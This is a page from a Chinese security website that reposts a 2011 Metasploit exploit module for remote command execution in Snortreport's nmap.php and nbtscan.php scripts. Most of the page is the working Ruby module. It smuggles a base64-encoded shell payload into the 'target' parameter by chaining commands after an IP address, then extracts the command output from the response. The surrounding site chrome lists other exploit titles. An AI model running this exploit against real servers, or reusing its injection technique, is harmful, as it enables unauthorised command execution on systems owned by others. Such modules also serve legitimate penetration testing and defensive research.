首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Snortreport nmap.php and nbtscan.php Remote Command Execution
来源:http://www.metasploit.com 作者:Rascagneres 发布时间:2011-10-11  

##
# $Id: snortreport_exec.rb 13843 2011-10-09 06:12:54Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking

 include Msf::Exploit::Remote::Tcp
 include Msf::Exploit::Remote::HttpClient

 def initialize(info={})
  super(update_info(info,
   'Name'           => 'Snortreport nmap.php and nbtscan.php Remote Command Execution',
   'Description'    => %q{
    This module exploits an arbitrary command execution vulnerability in
    nmap.php and nbtscan.php scripts.
   },
   'License'        => MSF_LICENSE,
   'Author'         =>
    [
     'Paul Rascagneres'  #itrust consulting during hack.lu 2011
    ],
   'Version'        => '$Revision: 13843 $',
   'Payload'        =>
   {
    'Compat'     =>
    {
     'PayloadType'  => 'cmd',
     'RequiredCmd'  => 'generic perl ruby bash telnet',
    }
   },
   'Platform'       => ['unix', 'linux'],
   'Arch'           => ARCH_CMD,
   'Targets'        => [['Automatic',{}]],
   'DisclosureDate' => 'Sep 19 2011',
   'DefaultTarget'  => 0
  ))

  register_options(
   [
    OptString.new('URI', [true, "The full URI path to nmap.php or nbtscan.php", "/snortreport-1.3.2/nmap.php"]),
   ],self.class)
 end

 def exploit
  base64_payload = ""
  base64_payload_temp=Base64.encode64(payload.encoded).chomp
  base64_payload_temp.each_line do |line|
   base64_payload << line.chomp
  end

  start = "127.0.0.1 && echo XXXXX && eval $(echo "
  last  = " | base64 -d) && echo ZZZZZ"
  custom_payload = start << base64_payload << last

  res = send_request_cgi({
   'uri'       => datastore['URI'],
   'vars_get'  =>
   {
    'target' => custom_payload
   }
  },10)

  if (res)
   to_print=false
   already_print=false
   part=res.body.gsub("<BR>","")
   part.each_line do |line|
    if line =~ /ZZZZZ/
     to_print=false
    end
    if to_print == true
     print(line)
    end
    if line =~ /XXXXX/
     already_print=true
     to_print=true
    end
   end

   if already_print == false
    print_error("This server may not be vulnerable")
   end
  else
   print_error("No response from the server")
  end
 end
end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Opera Browser 10/11/12 (SVG la
·myBB 1.6.4 Backdoor Exploit
·ScriptFTP <= 3.3 Remote Buffer
·ACDSee FotoSlate PLP File id P
·Linux pkexec and polkitd 0.96
·Apache mod_proxy Proof Of Conc
·Linux Kernel 2.6.9-34 Local ro
·TugZip 3.5 Zip File Parsing Bu
·Spreecommerce 0.60.1 Arbitrary
·Mozilla Firefox Array.reduceRi
·pkexec Race Condition Privileg
·FreeBSD 8.0 Local Root Exploit
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved